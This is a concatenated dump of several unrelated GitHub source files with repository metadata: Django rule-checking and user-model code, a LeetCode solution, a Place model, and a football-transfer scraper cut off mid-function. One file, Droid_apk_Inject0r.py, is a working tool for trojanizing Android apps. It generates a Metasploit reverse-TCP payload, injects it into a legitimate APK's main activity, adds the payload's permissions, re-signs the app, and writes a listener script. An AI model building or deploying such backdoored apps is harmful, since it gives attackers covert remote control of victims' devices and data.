from .cache import RuleCache, TopicalRuleCache
from .continuations import ContinuationStore, NoContinuationError
logger = logging.getLogger(__name__)
class RuleChecker(object):
    """Matches rules for a trigger and runs their continuations.

    Exactly one rule source is chosen at construction, tried in this
    order: ``cache`` (a ready cache object), ``rules`` (an iterable of
    rule objects), ``queryset``, ``source``, or the cache class's
    ``default`` attribute.  Every other keyword argument becomes part of
    the continuation-binding context.  Instances are context managers:
    continuations are bound in ``__enter__`` and released in ``__exit__``.
    """
    __slots__ = ('cache', 'context', '_cont', 'continuations')
    def __init__(self, **kwargs):
        # ``cls`` is the cache class wrapped around whichever source wins.
        cls = kwargs.get('cls') or TopicalRuleCache
        if 'cache' in kwargs:
            cache = kwargs.get('cache')
        elif 'rules' in kwargs:
            cache = cls()
            for r in kwargs['rules']:
                cache.add_source(r.trigger, r)
        elif 'queryset' in kwargs:
            cache = cls(RuleCache(kwargs['queryset']))
        elif 'source' in kwargs:
            cache = cls(kwargs['source'])
        elif hasattr(cls, 'default'):
            cache = cls.default
        else:
            raise ValueError('No rules, rule cache, or rule source provided.')
        # Any kwarg that is not a recognised option feeds the context dict.
        used = {'cls', 'rules', 'cache', 'queryset', 'source',
                'context', 'continuations'}
        context = {k: kwargs[k] for k in kwargs if k not in used}
        context.update(kwargs.get('context', ()))
        self.context = context
        self.cache = cache
        self._cont = kwargs.get('continuations') or ContinuationStore.default
    def check(self, trigger, *objects, **extra):
        """Run every rule matching ``trigger``; return the matched rules.

        Rules whose continuation cannot be resolved are logged (debug)
        and skipped.  Requires the checker to have been entered so that
        ``self.continuations`` is bound.
        """
        info = {'objects': objects, 'extra': extra}
        matches = self.cache[trigger]._matches(info)
        for rule in matches:
            try:
                rule.continue_(info, self.continuations)
            except NoContinuationError:
                logger.debug('Continuation not found', exc_info=True)
        return matches
    def __enter__(self):
        # Bind the continuation store to this checker's context.
        self.continuations = self._cont.bind(self.context)
        return self
    def __exit__(self, *exc_info):
        self.continuations.unbind()
        del self.continuations
def check_rules(*args, **kwargs):
    """Decorator wrapping a Django view in a bound RuleChecker.

    May be used bare (``@check_rules``) or parameterised
    (``@check_rules(rules=...)``); in the parameterised form the first
    call receives no positional args and returns the real decorator.
    The wrapped view sees the checker as ``request.rule_checker``.
    """
    if not args:
        # Called with options only: return the actual decorator.
        return lambda func: check_rules(func, **kwargs)
    elif len(args) != 1 or not callable(args[0]):
        raise TypeError('Requires exactly one callable positional argument')
    func = args[0]
    # NOTE(review): one RuleChecker instance is shared by every request
    # hitting this view -- confirm the checker is safe to re-enter.
    rc = RuleChecker(**kwargs)
    @functools.wraps(func)
    def wrapper(request, *a, **k):
        with rc:
            request.rule_checker = rc
            return func(request, *a, **k)
    return wrapper
class SignalChecker(RuleChecker):
    """RuleChecker driven by Django model signals.

    While entered as a context manager it connects to ``post_init``,
    ``pre_save``/``post_save`` and ``pre_delete``/``post_delete`` (for
    the given ``models``, or globally when none are given) and fires
    rules with triggers of the form
    ``'<event>.<app_label>.<model>[:<signal>]'``.  Pre-change snapshots
    of instances are kept in ``self.objects``, keyed by ``(model, pk)``,
    so update rules can compare old and new state.
    """
    __slots__ = ('user', 'models', 'objects')
    def __init__(self, user, *models, **kwargs):
        super(SignalChecker, self).__init__(**kwargs)
        self.user = user
        self.models = models
        self.objects = {}
    def track(self, obj):
        """
        Tracks an object so that edits can be properly distinguished from adds.
        """
        model = type(obj)
        is_tracked = any(issubclass(model, m) for m in self.models)
        if self.models and not is_tracked:
            msg = 'This checker only tracks objects of the following types: {}'
            model_names = ', '.join(m.__name__ for m in self.models)
            raise ValueError(msg.format(model_names))
        self._track(instance=obj, sender=model)
    def _track(self, **kwargs):
        # Snapshot saved instances under (model, pk); unsaved instances
        # (no pk yet) cannot be tracked.
        obj = kwargs['instance']
        if obj.pk:
            self.objects[(kwargs['sender'], obj.pk)] = deepcopy(obj)
    def _get_trigger(self, eventtype, model, sig=None):
        # Build '<event>.<app_label>.<model>[:<signal>]' from the concrete model.
        m = model._meta.concrete_model._meta
        key = '{}.{}.{}'.format(eventtype, m.app_label, m.object_name.lower())
        if sig:
            key += ':' + sig
        return key
    def _check_update(self, sender, instance, sig=None):
        # BUGFIX: _track() stores snapshots under (sender, pk), but this
        # method used to look up bare ``instance.pk`` and therefore never
        # found the original -- update rules silently never fired.
        key = (sender, instance.pk)
        if key not in self.objects:
            # Can't check rules without sufficient info.
            return
        original = self.objects[key]
        trigger = self._get_trigger('update', sender, sig)
        self.check(trigger, original, instance, user=self.user)
        if not sig or 'post' in sig:
            self._track(sender=sender, instance=instance)
    def _check_create(self, sender, instance, sig=None):
        trigger = self._get_trigger('create', sender, sig)
        self.check(trigger, instance, user=self.user)
        if not sig or 'post' in sig:
            self._track(sender=sender, instance=instance)
    def _check_pres(self, sender, **kwargs):
        # pre_save: a primary key distinguishes an edit from an add.
        i = kwargs['instance']
        if i.pk:
            self._check_update(sender, i, 'pre_save')
        else:
            self._check_create(sender, i, 'pre_save')
    def _check_posts(self, sender, **kwargs):
        i = kwargs['instance']
        if kwargs['created']:
            self._check_create(sender, i)
        else:
            self._check_update(sender, i)
    def _check_pred(self, sender, **kwargs):
        i = kwargs['instance']
        trigger = self._get_trigger('delete', sender, 'pre_delete')
        self.check(trigger, i, user=self.user)
    def _check_postd(self, sender, **kwargs):
        i = kwargs['instance']
        trigger = self._get_trigger('delete', sender)
        self.check(trigger, i, user=self.user)
        # BUGFIX: drop the snapshot under its real (sender, pk) key; the
        # old code keyed on bare pk and never removed anything.
        self.objects.pop((sender, i.pk), None)
    def _connect(self, sender=None):
        post_init.connect(self._track, sender=sender)
        pre_save.connect(self._check_pres, sender=sender)
        post_save.connect(self._check_posts, sender=sender)
        pre_delete.connect(self._check_pred, sender=sender)
        post_delete.connect(self._check_postd, sender=sender)
    def _disconnect(self, sender=None):
        post_init.disconnect(self._track, sender=sender)
        pre_save.disconnect(self._check_pres, sender=sender)
        post_save.disconnect(self._check_posts, sender=sender)
        pre_delete.disconnect(self._check_pred, sender=sender)
        post_delete.disconnect(self._check_postd, sender=sender)
    def __enter__(self):
        """
        Connects signals so the RuleChecker will know when to check rules and
        whether the action is an add, edit or delete.
        """
        if self.models:
            for m in self.models:
                self._connect(m)
        else:
            self._connect()
        return super(SignalChecker, self).__enter__()
    def __exit__(self, *exc_info):
        """Disconnects signals."""
        if self.models:
            for m in self.models:
                self._disconnect(m)
        else:
            self._disconnect()
        super(SignalChecker, self).__exit__()
def check_signals(*args, **kwargs):
    """Decorator wrapping a Django view in a per-request SignalChecker.

    Usable bare or parameterised (``models=[...]`` plus any RuleChecker
    options).  Each request gets a fresh checker bound to
    ``request.user`` and exposed as ``request.signal_checker``.
    """
    if not args:
        return lambda func: check_signals(func, **kwargs)
    elif len(args) != 1 or not callable(args[0]):
        raise TypeError('Requires exactly one callable positional argument')
    func = args[0]
    models = kwargs.pop('models', None) or ()
    # Validate arguments using the constructor.
    sc = SignalChecker(None, *models, **kwargs)
    # Though we can't reuse the instance, we can reuse the cache.
    kwargs.setdefault('cache', sc.cache)
    @functools.wraps(func)
    def wrapper(request, *a, **k):
        with SignalChecker(request.user, *models, **kwargs) as sc:
            request.signal_checker = sc
            return func(request, *a, **k)
    return wrapper
| [
"gphelps@verisys.com"
] | gphelps@verisys.com |
dbb15fa1a63e4b59e44ada51fc7db08061e74114 | 5a9f5fd278bed94afac4d3db1e5e2853f135f390 | /usermgt/models.py | 85bbf55ef313bd0d7a3ebc0f37980526f10edfb7 | [] | no_license | bihanviranga/OpenIntra-backend | afed82a2e68d809c6f3cd3a116852cab1fbaf255 | a2740fab9e98b121d735cc40a300cfd0e163ad46 | refs/heads/main | 2023-02-12T11:59:15.507286 | 2020-12-21T18:00:03 | 2020-12-21T18:00:03 | 319,279,906 | 0 | 0 | null | 2020-12-07T10:14:35 | 2020-12-07T10:14:34 | null | UTF-8 | Python | false | false | 817 | py | from django.db import models
from django.contrib.auth.models import AbstractUser
class User(AbstractUser):
    """
    Custom user model: authentication is by unique e-mail address, with a
    few extra organisational fields.

    Inherited fields from AbstractUser:
    username
    password
    first_name
    last_name
    email
    date_joined
    """
    # Redeclared to enforce uniqueness -- it is the login key below.
    email = models.EmailField(unique=True)
    role = models.CharField(max_length=100, blank=True, null=True)
    department = models.CharField(max_length=100, blank=True, null=True)
    extension = models.CharField(max_length=10, blank=True, null=True)
    position = models.CharField(max_length=100, blank=True, null=True)
    # use the email field to login
    USERNAME_FIELD = 'email'
    # by default, USERNAME_FIELD and password is required
    REQUIRED_FIELDS = ['username',]
    def __str__(self):
        return "{}".format(self.email)
| [
"bihanviranga@gmail.com"
] | bihanviranga@gmail.com |
2d10cde0506e07624d53ef566dd4a4a1997f78ca | 93d02a345c18508561284c65382b1388a8aac1bf | /Droid_apk_Inject0r.py | 4007e55e66b4376c256add164a1b3ced49307233 | [] | no_license | TH4X-Y/Droid_Inject0r | 5148e1422a595b434318efc4f9e937555246d8cb | 206fc97fcb577214cd3c96a8d2b9a8a766c77b84 | refs/heads/master | 2021-09-06T10:25:55.594246 | 2018-02-05T14:33:56 | 2018-02-05T14:33:56 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 11,601 | py | #!/usr/bin/env python2
''' Python Script .. inject malicious apk file into original apk [Created by : @Y4SS3R005]'''
try:
import os,sys
import subprocess
from pwn import log
from time import sleep
from xml.dom import minidom
from argparse import ArgumentParser
except ImportError as e:
raise e
try:
raw_input = input
except NameError:
pass
DN = open(os.devnull,mode='w')
class Fore:
	"""ANSI terminal escape codes used to colour console output."""
	BOLD = "\033[1m"
	UNDE = "\033[4m"
	GREEN = "\033[92m"
	BLUE = "\033[94m"
	YELLOW = "\033[93m"
	RED = "\033[91m"
	WHITE = "\033[0m"  # reset code (clears styling), used as the default colour
	CYAN = "\033[0;36m"
def banner():
print('''
,------. ,--. ,--. ,--. ,--. ,--. ,--.
| .-. \ ,--.--. ,---. `--' ,-| | | |,--,--, `--' ,---. ,---.,-' '-. / \ ,--.--.
| | \ :| .--'| .-. |,--.' .-. | | || \ ,--.| .-. :| .--''-. .-'| () || .--'
| '--' /| | ' '-' '| |\ `-' | | || || | | |\ --.\ `--. | | \ / | |
`-------' `--' `---' `--' `---' `--'`--''--'.-' / `----' `---' `--' `--' `--'
'---' Created by : @'''+Fore.GREEN+'''Y4SS3R005'''+Fore.WHITE+'''
''')
def parser_error(errmsg):
print(Fore.YELLOW+"\nUsage:"+Fore.WHITE+" python " + sys.argv[0] + " -p [PAYLOAD] --lhost=[LHOST] --lport=[PORT] --apkfile=[APKFILE]")
print(Fore.RED+"\n\tError: "+Fore.YELLOW+errmsg +Fore.WHITE+'\n')
sys.exit()
def print_help():
print(Fore.YELLOW+"\nUsage:"+Fore.WHITE+" python " + sys.argv[0] + " -p [PAYLOAD] --lhost=[LHOST] --lport=[PORT] --apkfile=[APKFILE]")
print(Fore.WHITE+"\n\t<< "+Fore.YELLOW+"Coded by : "+Fore.GREEN+"Yasser Janah"+Fore.WHITE+" >>")
print(Fore.WHITE+"\t<< "+Fore.YELLOW+"Facebook : "+Fore.GREEN+"https://facebook.com/yasserjanah19"+Fore.WHITE+" >>")
print(Fore.WHITE+"\t<< "+Fore.YELLOW+"Twitter : "+Fore.GREEN+"https://twitter.com/Y4ss3rJ4n4h"+Fore.WHITE+" >>")
print(Fore.WHITE+"\t<< "+Fore.YELLOW+"Github : "+Fore.GREEN+"https://github.com/Y4SS3R005/"+Fore.WHITE+" >>\n")
print(Fore.WHITE+'\t-p , --payload\t\ta metasploit android payload (e.x android/meterpreter/reverse_tcp) (not required)')
print(Fore.WHITE+'\t-lh , --lhost\t\t The listen address (not required)')
print(Fore.WHITE+'\t-lp , --lport\t\t The listen port (default 4444)')
print(Fore.WHITE+'\t-ap , --apkfile\t\tpath of apk file (required!!)\n')
def Generate_payload(LHOST,LPORT,PAYLOAD):
	"""Run msfvenom to build the raw Android payload as ./payload.apk.

	Returns True when payload.apk exists afterwards, False otherwise.
	"""
	cmd = ['msfvenom','-p',PAYLOAD,'LHOST='+LHOST,'LPORT='+LPORT,'-o','payload.apk']
	# msfvenom's output is discarded (DN is os.devnull opened at module level).
	proc = subprocess.Popen(cmd,stdout=DN,stderr=DN)
	proc.wait()
	if os.path.isfile('payload.apk'): return True
	else: return False
class APK:
	"""Wrapper around apktool/sign.jar operations for one APK file.

	Decompile() unpacks ``apkfile`` into ``outputfile``; Recompile()
	rebuilds that tree as ``<name>-final.apk``; SignAPK() signs the
	rebuilt APK.  Recompile()/SignAPK() return the final APK path on
	success and False on failure; Decompile() returns True/False.
	"""
	def __init__(self,apkfile,outputfile):
		self.apkfile = apkfile
		self.outputfile = outputfile
		# The patched/signed build lives next to the source APK.
		self.finalAPK = self.apkfile.replace('.apk','-final.apk')
		self.dec_cmd = ['java','-jar','core/apktool.jar','d','-f','-o',self.outputfile,self.apkfile]
		self.rec_cmd = ['java','-jar','core/apktool.jar','b','-f',self.outputfile,'-o',self.finalAPK]
		self.sig_cmd = ['java','-jar','core/sign.jar',self.finalAPK,'--override']
	def Decompile(self):
		"""Decompile the APK with apktool; True if the output dir appeared."""
		proc = subprocess.Popen(self.dec_cmd,stdout=DN,stderr=DN)
		proc.wait()
		if os.path.exists(self.outputfile): return True
		else: return False
	def Recompile(self):
		"""Rebuild the decompiled tree; return the final APK path or False."""
		proc = subprocess.Popen(self.rec_cmd,stdout=DN,stderr=DN)
		proc.wait()
		if os.path.isfile(self.finalAPK): return self.finalAPK
		else: return False
	def SignAPK(self):
		"""Sign the rebuilt APK in place; return its path, or False if absent."""
		proc = subprocess.Popen(self.sig_cmd,stdout=subprocess.PIPE,stderr=subprocess.PIPE)
		proc.wait()
		if not os.path.isfile(self.finalAPK): return False
		else: return self.finalAPK
def Copy():
    """Copy the metasploit payload smali tree into the decompiled APK.

    Returns True when the copy succeeded and False otherwise.  The
    previous version unconditionally returned True, hiding ``cp``
    failures from main()'s progress reporting.
    """
    Copy_cmd = ['cp', '-rf', 'PAYLOAD/smali/com/metasploit/', 'ORIGINAL/smali/com/']
    # subprocess.DEVNULL replaces the module-level DN handle; same effect,
    # no dependency on a shared global file object.
    proc = subprocess.Popen(Copy_cmd, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
    return proc.wait() == 0
class Parser:
	"""Reads the decompiled app's AndroidManifest.xml."""
	def AndroidManifest(self):
		"""Return (activity_dir_path, smali_file_name) for the first activity.

		E.g. 'com.foo.MainActivity' -> ('com/foo', 'MainActivity.smali').
		"""
		xmldoc = minidom.parse('ORIGINAL/AndroidManifest.xml')
		itemlist = xmldoc.getElementsByTagName('activity')
		# Assumes the first <activity> is the one to patch (the launcher)
		# -- TODO confirm; manifests do not have to list it first.
		ActivityPath = itemlist[0].attributes['android:name'].value
		SmalifileName = ActivityPath.split('.')[-1]+'.smali'
		ActivityPath = '/'.join(ActivityPath.split('.')[0:-1])
		return ActivityPath , SmalifileName
class Inject:
	"""Patches an activity's smali source to start the metasploit stage."""
	def __init__(self,ActivityPath,SmalifileName):
		self.ActivityPath = ActivityPath
		self.SmalifileName = SmalifileName
		# Accumulates the rewritten smali source line by line.
		self.ManActivity = ""
		# smali call inserted right after onCreate()'s signature line.
		self.payload = '    invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V\n'
		self.SMALI = 'ORIGINAL/smali/'+self.ActivityPath+os.sep+self.SmalifileName
		self.CheckBefore = ';->onCreate(Landroid/os/Bundle;)V'
		self.CheckAfter = 'Lcom/metasploit/stage/Payload'
	def Inject_payload(self):
		"""Insert the payload call into the smali file; True on success."""
		file = open(self.SMALI ,'r')
		for item in file.readlines():
			if self.CheckBefore in item:
				self.ManActivity += item + self.payload
			else : self.ManActivity += item
		file.close()
		file = open(self.SMALI ,'w')
		file.write(self.ManActivity)
		file.close()
		Actfile = open(self.SMALI ,'r')
		if self.CheckAfter in Actfile.read(): return True
		else : return False
		# NOTE(review): unreachable -- both branches above return first,
		# so Actfile is never closed.
		Actfile.close()
def GetPermissions():
	"""Collect the <uses-permission> lines from the payload's manifest.

	Returns them concatenated as one string (with their newlines).
	"""
	Permissions = ""
	PATHpayloadManifest = 'PAYLOAD/AndroidManifest.xml'
	file = open(PATHpayloadManifest,'r')
	for i in file.readlines():
		if '<uses-permission android:name=' in i:
			Permissions += i
	file.close()
	return Permissions
def AddPermissions(Permissions):
    """Insert ``Permissions`` after the first permission line of the
    target APK's AndroidManifest.xml.

    Returns True when the rewritten manifest contains ``Permissions``,
    False otherwise (e.g. no existing permission line to anchor on).

    BUGFIX: the old loop only appended a permission line when it was the
    *first* one seen, so every subsequent <uses-permission> line of the
    original manifest was silently dropped from the rewritten file.  It
    also leaked the final read handle (close() after return).
    """
    manifest_path = 'ORIGINAL/AndroidManifest.xml'
    check = '<uses-permission android:name='
    inserted = False
    rebuilt = ""
    with open(manifest_path, 'r') as fh:
        for item in fh:
            # Keep every original line; splice the new block in once,
            # right after the first existing permission line.
            rebuilt += item
            if not inserted and check in item:
                rebuilt += Permissions
                inserted = True
    with open(manifest_path, 'w') as fh:
        fh.write(rebuilt)
    with open(manifest_path, 'r') as fh:
        return Permissions in fh.read()
def Create_rc_file(payload, lhost, lport):
    """Write droid_apk.rc, a metasploit resource script that starts a
    background multi/handler listener for the generated payload.

    Uses a context manager (the original left the handle to be closed
    manually) and avoids shadowing the builtins-adjacent names
    ``file``/``write``.
    """
    rc_file = 'droid_apk.rc'
    content = ('use exploit/multi/handler\n'
               'set PAYLOAD {0}\n'
               'set LHOST {1}\n'
               'set LPORT {2}\n'
               'set ExitOnSession false\n'
               'exploit -j\n').format(payload, lhost, lport)
    with open(rc_file, mode='w') as fh:
        fh.write(content)
def cleanup(apk):
	"""Remove the work directories and the raw payload APK.

	``apk`` is unused; the parameter is kept for existing callers.
	"""
	cmd = ['rm','-rf','ORIGINAL','PAYLOAD','payload.apk']
	subprocess.call(cmd)
def main():
parser = ArgumentParser()
parser.add_argument('-p','--payload')
parser.add_argument('-lh','--lhost')
parser.add_argument('-lp','--lport')
parser.add_argument('-ap','--apkfile',required=True)
parser.error = parser_error
parser.print_help = print_help
args = parser.parse_args()
banner()
if not args.payload:
log.info("payload not selected .. default "+Fore.YELLOW+"'"+Fore.WHITE+"android/meterpreter/reverse_tcp"+Fore.YELLOW+"'"+Fore.WHITE)
PAYLOAD = 'android/meterpreter/reverse_tcp'
else: PAYLOAD = args.payload
if not args.lhost:
LHOST = subprocess.check_output(['hostname','-I'])
LHOST = LHOST.decode('utf-8').strip()
if '.' in LHOST:
log.info("LHOST not selected .. using "+Fore.YELLOW+"'"+Fore.WHITE+LHOST+Fore.YELLOW+"'"+Fore.WHITE);
else: sys.exit(log.failure('error with lhost (please use --lhost=[IP])'))
else: LHOST = args.lhost
if not args.lport:LPORT='4444';log.info("LPORT not selected .. using "+Fore.YELLOW+"'"+Fore.WHITE+LPORT+Fore.YELLOW+"'"+Fore.WHITE)
else: LPORT = args.lport
if not os.path.isfile(args.apkfile): log.failure('apkfile not found');sys.exit(0)
else:pass
apkfile = (Fore.YELLOW+"'"+Fore.CYAN+args.apkfile+Fore.YELLOW+"'"+Fore.WHITE)
p = log.progress("Generating payload")
res = Generate_payload(LHOST,LPORT,PAYLOAD)
if res: p.success(Fore.GREEN+" Generated."+Fore.WHITE)
else: p.failure(Fore.RED+" not Generated."+Fore.WHITE);sys.exit(0)
p = log.progress("Decompling payload")
res = APK('payload.apk','PAYLOAD').Decompile()
if res: p.success(Fore.GREEN+" Decompiled."+Fore.WHITE)
else: p.failure(Fore.RED+" not Decompiled."+Fore.WHITE);sys.exit(0)
p = log.progress("Decompling "+apkfile)
res = APK(args.apkfile,'ORIGINAL').Decompile()
if res: p.success(Fore.GREEN+" Decompiled."+Fore.WHITE)
else: p.failure(Fore.RED+" not Decompiled."+Fore.WHITE);sys.exit(0)
sleep(2)
p = log.progress("Copying payload files into "+apkfile)
res = Copy()
if res: p.success(Fore.GREEN+" Done."+Fore.WHITE)
else: p.failure(Fore.RED+" copying error."+Fore.WHITE);sys.exit(0)
log.info('Parsing AndroidManifest file')
(activity , smali ) = Parser().AndroidManifest()
log.info("Activity PATH : "+Fore.YELLOW+"'"+Fore.BLUE+activity+Fore.YELLOW+"'"+Fore.WHITE)
log.info("SMALI File : "+Fore.YELLOW+"'"+Fore.BLUE+smali+Fore.YELLOW+"'")
p = log.progress("Injecting payload into "+apkfile)
res = Inject(activity,smali).Inject_payload()
if res: p.success(Fore.GREEN+" Injected."+Fore.WHITE)
else: p.failure(Fore.RED+" Injecting error."+Fore.WHITE);sys.exit(0)
p = log.progress('Get Permissions from payload AndroidManifest file')
Permissions = GetPermissions()
if '<uses-permission' in Permissions: p.success(Fore.GREEN+' Done.'+Fore.WHITE)
else: p.failure(Fore.RED+" Get 0 permissions."+Fore.WHITE);sys.exit(0)
sleep(1)
p = log.progress("Add Permissions into "+apkfile+" AndroidManifest file")
res = AddPermissions(Permissions)
if res: p.success(Fore.GREEN+" Permissions Added."+Fore.WHITE)
else: p.failure(Fore.RED+" Permissions not added."+Fore.WHITE);sys.exit(0)
sleep(1)
p = log.progress("Recompling "+apkfile)
readySIGN = APK(args.apkfile,'ORIGINAL').Recompile()
if readySIGN != False : p.success(Fore.GREEN+" Recompiled."+Fore.WHITE)
else : p.failure(Fore.RED+" error with recompiling "+apkfile+".");exit(0)
sleep(1)
p = log.progress("Signing "+apkfile)
finalAPK = APK(args.apkfile,'').SignAPK()
if finalAPK == False : p.failure(Fore.RED+" error with Signing "+apkfile+".");sys.exit(0)
else:
p.success(Fore.GREEN+" Signed."+Fore.WHITE)
print(Fore.CYAN+'\n[+]'+Fore.WHITE+" metasploit rc file : "+Fore.RED+"'"+Fore.YELLOW+os.getcwd()+os.sep+'droid_apk.rc'+Fore.RED+"'"+Fore.WHITE)
print(Fore.CYAN+"\n[+]"+Fore.WHITE+" final apk : "+Fore.RED+"'"+Fore.YELLOW+os.getcwd()+os.sep+args.apkfile.replace('.apk','-final.apk')+Fore.RED+"'\n"+Fore.WHITE)
cleanup(args.apkfile)
Create_rc_file(PAYLOAD,LHOST,LPORT)
if __name__ == '__main__':
try:
main()
except Exception as err:
print(err)
except KeyboardInterrupt:
print(Fore.RED+"[+]"+Fore.WHITE+" Exiting ..")
sleep(1)
| [
"noreply@github.com"
] | TH4X-Y.noreply@github.com |
cc2a881d553a0a3c1080c3d0507a4ed1361e3294 | f69262312c39583f9d95d4952bc3813019ab83d6 | /Python/easy/0645_set_mismatch.py | 56efed8d3f79161c7ee67167164d09dc1171c34d | [
"MIT"
] | permissive | CalmScout/LeetCode | 7de7159071780a09185d3e6d6f8fe57f1b11870f | 3e863c4e4029bd3e101af27754de1417293fd300 | refs/heads/master | 2022-12-20T21:48:14.467733 | 2022-12-14T16:03:49 | 2022-12-14T16:03:49 | 134,153,647 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 963 | py | """
The set S originally contains numbers from 1 to n. But unfortunately, due to the data error,
one of the numbers in the set got duplicated to another number in the set, which results in
repetition of one number and loss of another number. Given an array nums representing the
data status of this set after the error. Your task is to firstly find the number occurs twice
and then find the number that is missing. Return them in the form of an array.
"""
from typing import List
from collections import Counter
class Solution:
    def findErrorNums(self, nums: List[int]) -> List[int]:
        """Return [duplicated_number, missing_number] for a 1..n set with one error.

        The distinct values of ``nums`` are the original set minus the missing
        number, so:
          * missing   = the one member of 1..n not present in ``nums``;
          * duplicate = sum(nums) - sum(distinct values), since the duplicate
            is the only value counted twice.
        This replaces the original Counter + linear re-scan with a single set
        and O(1) arithmetic over precomputed sums.
        """
        n = len(nums)
        present = set(nums)
        missing = (set(range(1, n + 1)) - present).pop()
        duplicate = sum(nums) - sum(present)
        return [duplicate, missing]
if __name__ == "__main__":
    # Smoke test: the sample from the problem statement.
    sample = [1, 2, 2, 4]
    expected = [2, 3]
    answer = Solution().findErrorNums(sample)
    assert answer == expected, (answer, expected)
| [
"popovanton567@gmail.com"
] | popovanton567@gmail.com |
e9c6a490422bade7bff0ccdc363ca4f326b7f8bb | 55821cab06b431b3b253df77559800b9f84ed2a7 | /models/place.py | a918d531769a7e7fed34aacbe57ca9ec87ce9dab | [] | no_license | kaci65/AirBnB_clone | 1fa2f1721d752635dd895de09fcedc194612ca91 | b2c03583aab891fde5e87e7e34b40bcf2aa7ebb6 | refs/heads/main | 2023-03-11T08:23:08.811811 | 2021-02-28T20:41:17 | 2021-02-28T20:41:17 | 340,441,645 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 382 | py | #!/usr/bin/python3
"""Place module"""
import models
from models.base_model import BaseModel
class Place(BaseModel):
    """A rental place/listing; persistence behaviour comes from BaseModel."""
    # Identifiers linking this place to its City and owning User.
    city_id = ""
    user_id = ""
    # Human-readable listing information.
    name = ""
    description = ""
    # Capacity / layout counters; all default to 0.
    number_rooms = 0
    number_bathrooms = 0
    max_guest = 0
    price_by_night = 0
    # Geographic coordinates of the place.
    latitude = 0.0
    longitude = 0.0
    # NOTE(review): defaults to "" although the name suggests a list of
    # Amenity ids — confirm the expected type against the serializer.
    amenity_ids = ""
| [
"wanjikukarugi@gmail.com"
] | wanjikukarugi@gmail.com |
04c160f0b2359b01e9a2909241bf75c9ca9c4a3a | 5b4f1557c0eda22108cf22c399b8d08dceabe315 | /dags/etl_scripts/transfers_scraping_etl.py | cdaaf39953ba49dc3e66f1d771d50ac71a4b6eb6 | [] | no_license | leonardopanatta/transfermarkt-webscraper-airflow | 0121d512f6379c88bda6c7ad5b4e00ddae7ef95e | 7b0ad4613dfdc62d7a9e306f9865ca7889772764 | refs/heads/master | 2023-05-13T17:04:42.555721 | 2021-06-07T20:49:53 | 2021-06-07T20:49:53 | 371,493,846 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 14,685 | py | # -*- coding: utf-8 -*-
import glob
import os
import pandas as pd
import requests
import csv
import logging
from bs4 import BeautifulSoup
from pathlib import Path
from datetime import datetime
from airflow.hooks.S3_hook import S3Hook
class TransfersScrapingETL():
    """Scrape football transfer tables from transfermarkt.com.br, stage them as
    local CSV files, and upload the files to S3.

    Typical flow (driven from an Airflow DAG): call one of the scrape_*
    methods, then load_CSV_on_S3(), then delete_local_CSV().
    """
    def __init__(self):
        # Local staging directory for generated CSV files.
        self.local_data_path = "./dags/data/"
        # S3 access goes through the Airflow connection with this id.
        self.s3 = S3Hook('aws_s3_airflow_user')
        self.s3_bucket_name = "datalake-transfermarkt-sa-east-1"
        self.s3_bucket_folder = "latest_transfers/"
        self.s3_file_name_prefix = "transfers_"
        # Browser-like User-Agent so the site serves the regular HTML page.
        self.headers = {'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36'}
    def get_land_id(self, country):
        """Translate a supported country name into transfermarkt's numeric
        ``land_id`` URL parameter; raises for any unsupported country."""
        if country == "afghanistan":
            return 1
        elif country == "albania":
            return 3
        elif country == "andorra":
            return 5
        elif country == "angola":
            return 6
        elif country == "brazil":
            return 26
        elif country == "saudi_arabia":
            return 146
        elif country == "south_africa":
            return 159
        elif country == "usa":
            return 184
        elif country == "england":
            return 189
        else:
            raise Exception(f"{country} is not a valid country.")
    def scrape_latest_transfers(self, clubs_from_country):
        """Scrape every page of the "latest transfers" listing for clubs of
        *clubs_from_country* and write the rows to a dated local CSV.

        Each table row yields the player (name/position/age/nationalities),
        both clubs with their country and league, the transfer date, the
        market value at the time, and the fee. Columns are kept as parallel
        lists aligned by row index.
        """
        land_id = self.get_land_id(clubs_from_country)
        page_number = 1
        url = f"https://www.transfermarkt.com.br/transfers/neuestetransfers/statistik/plus/plus/1/galerie/0/wettbewerb_id/alle/land_id/{land_id}/minMarktwert/0/maxMarktwert/500.000.000/yt0/Mostrar/page/{page_number}"
        page_tree = requests.get(url, headers=self.headers)
        soup = BeautifulSoup(page_tree.content, 'html.parser')
        # The site renders an "empty" placeholder cell when there are no rows.
        no_players = soup.select("div.responsive-table > div.grid-view > span.empty")
        if not no_players:
            # One accumulator list per output CSV column.
            players_names_list = []
            players_positions_list = []
            players_ages_list = []
            players_first_nationalities_list = []
            players_second_nationalities_list = []
            clubs_left_list = []
            clubs_left_nationalities_list = []
            clubs_left_leagues_list = []
            clubs_joined_list = []
            clubs_joined_nationalities_list = []
            clubs_joined_leagues_list = []
            transfer_dates_list = []
            market_values_at_time_list = []
            transfer_fees_list = []
            pager = soup.select("div.pager > ul > li")
            number_of_pages = len(pager)
            # adjust in case it has no pager tag
            if number_of_pages == 0:
                number_of_pages = 1
            else:
                # presumably the first/last <li> are prev/next arrows, not
                # page numbers — TODO confirm against the live markup
                number_of_pages = number_of_pages - 2
            has_more_pages = True
            while has_more_pages:
                players_names = soup.select("table.items > tbody > tr > td:nth-of-type(1) > table > tr:nth-of-type(1) > td:nth-of-type(2) > a")
                players_positions = soup.select("table.items > tbody > tr > td:nth-of-type(1) > table > tr:nth-of-type(2) > td")
                players_ages = soup.select("table.items > tbody > tr > td:nth-of-type(2)")
                players_first_nationalities = []
                players_second_nationalities = []
                # Column 3 holds one or two flag images per player; a missing
                # second flag becomes an empty string to keep rows aligned.
                for player_nationality in soup.select("table.items > tbody > tr > td:nth-of-type(3)"):
                    player_first_nationality = player_nationality.select("td > img:nth-of-type(1)")
                    player_second_nationality = player_nationality.select("td > img:nth-of-type(2)")
                    players_first_nationalities.append(player_first_nationality[0].get("title"))
                    if player_second_nationality:
                        players_second_nationalities.append(player_second_nationality[0].get("title"))
                    else:
                        players_second_nationalities.append("")
                clubs_left = soup.select("table.items > tbody > tr > td:nth-of-type(4) > table > tr:nth-of-type(1) > td:nth-of-type(2) > a")
